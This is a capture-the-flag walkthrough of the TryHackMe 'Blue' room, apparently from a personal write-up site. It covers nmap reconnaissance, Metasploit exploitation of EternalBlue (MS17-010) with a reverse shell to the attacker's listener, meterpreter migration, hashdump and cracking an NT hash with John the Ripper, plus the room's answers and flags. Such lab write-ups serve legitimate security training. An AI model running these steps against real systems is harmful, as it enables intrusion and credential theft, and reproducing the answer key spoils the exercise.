✍️
Writeups and Walkthroughs
HomeGitHubPortfolio Twitter/X Medium Cont@ct
  • ✍️Writeups and Walkthroughs
  • THM
    • Simple CTF
    • RootMe
    • Eternal Blue
    • Vulnversity
    • Pickle Rick
    • Brooklyn Nine Nine
    • Kenobi
    • Bounty Hacker
    • Overpass
    • LazyAdmin
    • Ignite
    • Bolt
    • Agent Sudo
    • Anonymous
    • Startup
    • Wgel
    • Lian_Yu
    • Blog
    • ColdBox
    • H4cked
    • Smag Grotto
    • Ice
    • Blaster
    • The Sticker Shop
    • 🔟OWASP
      • 1️⃣Injection
    • Active Directory Basics
    • Attacktive Directory
    • Post-Exploitation Basics
  • HackTheBox
    • Active
    • Devel
    • Delivery
    • Analytics
    • Bashed
    • Valentine
    • Sau
    • Sunday
    • Cap
    • Bizness
    • Chemistry %
  • Vulnhub
    • Brainpain (BoF)
  • DockerLabs
    • Trust
    • Upload
    • Vacaciones
  • DVWA
    • Install and configure DVWA
    • Command Injection
    • CSRF
    • File Inclusion
    • SQL Injection
    • SQLi Blind
  • Mutillidae II
    • Install & configure OWASP Mutillidae II
    • SQLi
      • SQLi Login Bypass
      • Extracting Data
      • Finding Number of Columns
      • Pivoting with SQL injection
    • Command Injection
      • Extracting User Accounts
      • Web Shell
    • IDOR & File Inclusion
      • Edit Another User's Profile
      • Extracting User Accounts
      • Extracting User Accounts with Local File Inclusion
      • Web Shell with Remote File Inclusion (RFI)
    • XSS
      • XSS Reflected
      • XSS Stored
      • XSS DOM-Based
  • Secure Bank
    • Install & configure Secure Bank
    • -----
      • SQLi Login Bypass
      • Extracting Data
      • Finding Number of Columns
      • Pivoting with SQL injection
    • -----
      • Extracting User Accounts
      • Web Shell
  • PortSwigger - Web Security Academy
    • Burp Suite Config
    • Information Disclosure
      • Information disclosure vulnerabilities
      • Common sources of information disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
    • Essential skills
      • Obfuscating attacks using encodings
        • SQL injection with filter bypass via XML encoding
      • Using Burp Scanner
      • Identifying unknown vulnerabilities
    • Server-side vulnerabilities
      • Path traversal
        • File path traversal, simple case
      • Access control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with password disclosure
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
      • Server-side request forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end system
      • File upload vulnerabilities
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
      • OS Command Injection
        • OS command injection, simple case
      • SQL injection
        • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
        • SQL injection vulnerability allowing login bypass
    • JWT Attacks
      • Json Web Tokens (JWT)
      • Exploiting JWT
        • JWT authentication bypass via unverified signature
        • JWT authentication bypass via flawed signature verification
        • JWT authentication bypass via weak signing key
        • To-Do
          • JWT authentication bypass via jwk header injection - %
          • JWT authentication bypass via jku header injection - %
          • JWT authentication bypass via kid header path traversal - %
    • API Testing
      • API Testing
        • Exploiting an API endpoint using documentation
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
      • Server-side parameter pollution
        • Exploiting server-side parameter pollution in a query string
    • Deserialization Insecure
      • Serialization vs Deserialization
        • Lab
        • Lab
      • Java Insecure Deserialization
        • Lab
        • Lab
      • PHP Insecure Deserialization
        • Lab
        • Lab
  • HomeMade Labs
    • Active Directory
      • AD Lab Setup
      • AD Enumeration
      • SMB Common Attacks
    • Pivoting
      • Pivoting Theory
      • Pivoting Guidelines
      • Lab (3 Targets)
    • Buffer Overflow (BoF)
      • BoF Theory
      • Brainpain (BoF Lab)
Powered by GitBook
On this page
  • Task 1 Reconnaissance - Deploy the machine
  • 1.1 - Deploy the machine
  • Task 2 - Gain Access
  • Task 3 - Escalate
  • Task 4 - Cracking
  • Task 5 - Find flags!
  1. THM

Eternal Blue

PreviousRootMeNextVulnversity

Last updated 1 year ago

🔗

Task 1 Reconnaissance - Deploy the machine

1.1 - Deploy the machine

🎯 Target IP: 10.10.33.26

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

su
echo "10.10.33.26 blue.thm" >> /etc/hosts

mkdir thm/blue
cd thm/blue

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 blue.thm
PING blue.thm (10.10.33.26) 56(84) bytes of data.
64 bytes from blue.thm (10.10.33.26): icmp_seq=1 ttl=127 time=73.9 ms
64 bytes from blue.thm (10.10.33.26): icmp_seq=2 ttl=127 time=70.3 ms
64 bytes from blue.thm (10.10.33.26): icmp_seq=3 ttl=127 time=75.1 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~128 secs. this indicates that the target is a windows system, while *nix systems usually have a TTL of 64 secs.

1.2 - How many services are running under port 1000?

nmap -p1-1000 --open -sS -n -Pn blue.thm -oG open_ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 19:35 CEST
Nmap scan report for blue.thm (10.10.33.26)
Host is up (0.069s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

3 ports open under port 1000

1.3 - What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

nmap -p135,139,445 -sV -sC -vvv -n -Pn blue.thm
PORT    STATE SERVICE      REASON          VERSION
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 39544/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 58246/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 23738/udp): CLEAN (Timeout)
|   Check 4 (port 12563/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-05T12:36:48-05:00
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-06-05T17:36:48
|_  start_date: 2023-06-05T17:02:02
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 0243a7b722e5 (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   0243a7b722e50000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000

This is an important info:

445/tcp open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

MS17-010

Task 2 - Gain Access

2.1 - Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

Start Metasploit

msfconsole -q
msf6 > search ms17-010
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

exploit/windows/smb/ms17_010_eternalblue

2.2 - Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

2.3 - Exploit the machine and gain a foothold.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST blue.thm
RHOST => blue.thm
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.80.228
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Task 3 - Escalate

3.1 - Convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
   

3.2 - Select this (use MODULE_PATH). Show options, what option are we required to change?

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.9.80.228:4444 -> 10.10.37.188:49211 (10.10.37.188)

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 2
SESSION => 2
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.80.228:4433 
[*] Post module execution completed
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

3.3 - Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

meterpreter > migrate 1068
[*] Migrating from 1364 to 1068...
[*] Migration completed successfully.
meterpreter > migrate 1704
[*] Migrating from 1068 to 1704...
meterpreter > migrate 1688
[*] Migrating from 1068 to 1688...
[*] Migration completed successfully.

Task 4 - Cracking

4.1 - Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

4.2 - Copy this password hash to a file and research how to crack it. What is the cracked password?

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jon_hash.txt

We copy this hash and crack it using John The Ripper while using rockyou.txt wordlist.

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jon_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (?)     
1g 0:00:00:00 DONE (2023-06-05 22:39) 1.369g/s 13973Kp/s 13973Kc/s 13973KC/s alr19882006..alpusidi

Jon's credentials are jon:alqfna22

alqfna22

Task 5 - Find flags!

5.1 - Flag1? This flag can be found at the system root.

As we have a meterpreter shell we could search for a file on the system.

We start by changing our directory to C:/ (root of system). We find the flag1.txt in the system root.

cd C:\\
dir
cat flag1.txt
🚩Reveal Flag1

flag{access_the_machine}

5.2 - Flag2? This flag can be found at the location where passwords are stored within Windows.

Check directories by using the “dir” command. Then I see the flag1.txt file.

cd C:/Windows/System32/config
cat flag2.txt
🚩Reveal Flag2

flag{sam_database_elevated_access}

5.3 - This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

meterpreter > search -f flag3.txt

After that you see the flag3.txt file, Then read it.

🚩Reveal Flag3

flag{admin_documents_can_be_valuable}

Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) or we can find it with searchsploit (CLI).

https://www.exploit-db.com/exploits/42315
Blue
tryhackme.com - © TryHackMe